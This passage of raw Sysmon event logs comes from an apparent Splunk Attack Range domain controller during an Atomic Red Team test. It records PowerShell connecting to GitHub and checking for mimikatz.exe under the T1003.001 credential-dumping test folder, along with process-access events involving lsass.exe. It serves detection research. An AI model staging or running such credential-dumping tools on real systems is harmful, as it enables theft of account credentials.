Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD6255F852A73C8AFE401A4C7FE1C5D4,SHA256=B2B7BC295CDE8A78311161CC060FACCA26DE9916B6C41F14FFD2D3F02125F64F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.432{4DB9351A-A326-60D3-3806-00000000CF01}5332ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.370{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.370{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.339{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.339{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:58.307{4DB9351A-A326-60D3-3806-00000000CF01}5332\PSHost.132689561982434617.5332.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x800000000000000025043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:56.173{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61528-false185.199.109.133cdn-185-199-109-133.github.com443https 354300x800000000000000025042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.968{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61527-false192.30.255.113lb-192-30-255-113-sea.github.com443https 23542300x800000000000000025041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.292{4DB9351A-A326-60D3-3806-00000000CF01}5332ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_cgytkfmp.aas.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.292{4DB9351A-A326-60D3-3806-00000000CF01}5332ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u5a3ccej.52v.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.292{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u5a3ccej.52v.ps12021-06-23 21:09:58.292 10341000x800000000000000025038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.276{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.245{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.245{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.229{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.229{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.229{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.229{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.229{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.229{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa
57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.243{4DB9351A-A326-60D3-3806-00000000CF01}5332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe) {exit 0} else {exit 1}} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.167{4DB9351A-A325-60D3-3706-00000000CF01}6172ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.120{4DB9351A-A325-60D3-3606-00000000CF01}70963256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.104{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.104{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.057{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.057{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x800000000000000025022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:58.026{4DB9351A-A325-60D3-3706-00000000CF01}6172\PSHost.132689561979102385.6172.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.010{4DB9351A-A325-60D3-3706-00000000CF01}6172ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_awfb5nuv.jme.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.010{4DB9351A-A325-60D3-3706-00000000CF01}6172ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tgsvclqv.22q.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.995{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tgsvclqv.22q.ps12021-06-23 21:09:57.995 23542300x800000000000000025018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.995{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
